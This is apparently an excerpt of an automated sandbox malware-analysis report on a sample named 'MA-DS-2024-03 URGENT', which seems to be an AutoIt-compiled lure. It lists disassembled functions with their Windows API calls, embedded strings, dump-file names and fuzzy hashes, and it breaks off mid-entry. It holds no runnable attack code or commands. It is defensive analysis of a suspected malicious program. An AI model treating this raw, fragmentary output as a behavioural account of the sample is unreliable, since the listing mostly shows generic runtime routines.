                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                        • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                        • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                        • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                        Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                        • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                        • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                        • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                        Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                        • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                        • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                        • Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                        • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                        Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                        • GetFocus.USER32 ref: 0048C20C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                        • _memset.LIBCMT ref: 0048C342
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                        • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 5f0392a49041063f851528f21fd0cc095304640a2ca453d75b64e0971020a7f5
                                                        • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                        • Opcode Fuzzy Hash: 5f0392a49041063f851528f21fd0cc095304640a2ca453d75b64e0971020a7f5
                                                        • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                        Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0047738F
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                        • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                        • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                        • SelectObject.GDI32(00000006,?), ref: 00477470
                                                        • DeleteObject.GDI32(?), ref: 00477479
                                                        • DeleteDC.GDI32(00000006), ref: 00477480
                                                        • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 38f3fe01feb1b09f86532a0290ba8cf14fcd08a53207e64a02ac188324b8f8dc
                                                        • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                        • Opcode Fuzzy Hash: 38f3fe01feb1b09f86532a0290ba8cf14fcd08a53207e64a02ac188324b8f8dc
                                                        • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                        Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                          • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                          • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: a6ae0d61964093dd796ea9672a22b337ae072d1d514d4edeabcf5631447491fe
                                                        • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                        • Opcode Fuzzy Hash: a6ae0d61964093dd796ea9672a22b337ae072d1d514d4edeabcf5631447491fe
                                                        • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                        Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462D50
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                        • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                        • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                        • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                        • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                        • GetCursorPos.USER32(?), ref: 00462F56
                                                        • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                        • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                        • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                        • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                        • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                        Function 016B24FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 016B2543
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3090
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30A2
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30B4
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30C6
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30D8
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30EA
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B30FC
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B310E
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3120
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3132
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3144
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3156
                                                          • Part of subcall function 016B3073: _free.LIBCMT ref: 016B3168
                                                        • _free.LIBCMT ref: 016B2538
                                                          • Part of subcall function 016B2096: HeapFree.KERNEL32(00000000,00000000,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?), ref: 016B20AC
                                                          • Part of subcall function 016B2096: GetLastError.KERNEL32(?,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?,?), ref: 016B20BE
                                                        • _free.LIBCMT ref: 016B255A
                                                        • _free.LIBCMT ref: 016B256F
                                                        • _free.LIBCMT ref: 016B257A
                                                        • _free.LIBCMT ref: 016B259C
                                                        • _free.LIBCMT ref: 016B25AF
                                                        • _free.LIBCMT ref: 016B25BD
                                                        • _free.LIBCMT ref: 016B25C8
                                                        • _free.LIBCMT ref: 016B2600
                                                        • _free.LIBCMT ref: 016B2607
                                                        • _free.LIBCMT ref: 016B2624
                                                        • _free.LIBCMT ref: 016B263C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: e6608b63d31b81715aa65dae19e0b233421eb505d221a95b412a770c398dd6dc
                                                        • Instruction ID: 45ce229936e551107c6ffcccf4f9c95e7d2dd02884824a43b1e44d4a4cb8a255
                                                        • Opcode Fuzzy Hash: e6608b63d31b81715aa65dae19e0b233421eb505d221a95b412a770c398dd6dc
                                                        • Instruction Fuzzy Hash: 8A313872A003069BEB31AB3DDCA4BD6B7EABB14251F10441DE45AD6261EB71B9D0CB24
                                                        Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 004788D7
                                                        • CoInitialize.OLE32(00000000), ref: 00478904
                                                        • CoUninitialize.OLE32 ref: 0047890E
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                        • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                        • VariantClear.OLEAUT32(?), ref: 00478C35
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID: ,,I
                                                        • API String ID: 2395222682-4163367948
                                                        • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                        • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                        • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                        • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                        Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                        • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                        • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                                                        • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                                                        Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                          • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                        • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                                                        • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                                                        • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                                                        Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 0919b58da7cc5f40bdebd74c0183a587c6a80134b558d621886d7f10d265267e
                                                        • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                                                        • Opcode Fuzzy Hash: 0919b58da7cc5f40bdebd74c0183a587c6a80134b558d621886d7f10d265267e
                                                        • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                                                        Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00464F7A
                                                          • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A4B400,00410E7B), ref: 004204A3
                                                        • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                        • SetActiveWindow.USER32 ref: 0046500B
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                        • Sleep.KERNEL32(000000FA), ref: 00465043
                                                        • IsWindow.USER32 ref: 0046504F
                                                        • EndDialog.USER32(00000000), ref: 00465060
                                                        Strings
                                                        Memory Dump Source
